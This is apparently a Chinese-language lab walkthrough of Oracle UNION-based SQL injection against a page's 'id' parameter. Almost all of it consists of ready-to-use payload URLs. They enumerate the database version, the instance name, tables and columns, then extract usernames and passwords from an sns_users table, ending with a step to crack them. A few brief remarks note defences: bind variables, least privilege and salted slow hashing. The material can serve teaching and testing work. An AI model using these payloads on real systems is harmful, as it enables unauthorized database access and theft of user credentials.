1.判断注入点(new_list.php 的 id 参数被直接拼接进 SQL 语句,这是后续所有步骤成立的前提;改用绑定变量即可消除该注入点)
2.用order by判断列数
3.用联合查询确定回显位置(显错点)
new_list.php?id=-1 union select 'null','null' from dual
4.查看版本信息
new_list.php?id=-1 union select 'null',(select banner from sys.v_$version where rownum=1) from dual
5.查询当前数据库库名(下面的语句读取的是 V$INSTANCE 中的实例名 instance_name;应用账号能读取 V$ 视图,通常说明其权限超出了业务所需)
new_list.php?id=-1 union select 'null',(select instance_name from V$INSTANCE) from dual
6.查询数据库表名
new_list.php?id=-1 union select 'null',(select table_name from user_tables where rownum=1) from dual
new_list.php?id=-1 union select 'null',(select table_name from user_tables where rownum=1 and table_name not in 'LOGMNR_SESSION_EVOLVE$') from dual
new_list.php?id=-1 union select 'null',(select table_name from user_tables where rownum=1 and table_name not in 'LOGMNR_SESSION_EVOLVE$' and table_name not in 'LOGMNR_GLOBAL$') from dual
new_list.php?id=-1 union select 'null',(select table_name from user_tables where rownum=1) from dual
7.查询数据库列名
new_list.php?id=-1 union select 'null',(select column_name from user_tab_columns where table_name='sns_users' and rownum=1 and column_name like '%USER%') from dual
new_list.php?id=-1 union select 'null',(select column_name from user_tab_columns where table_name='sns_users' and rownum=1 and column_name like '%USER%' and column_name<> 'USER_NAME') from dual
8.获取账号密码字段内容
new_list.php?id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1
new_list.php?id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1 and USER_NAME <> 'zhong' and USER_NAME not in 'hu'
9.对密码进行解密(若 USER_PWD 存的是哈希值,这一步实际是查表或碰撞还原而非解密;加盐的慢哈希存储能显著增加还原难度)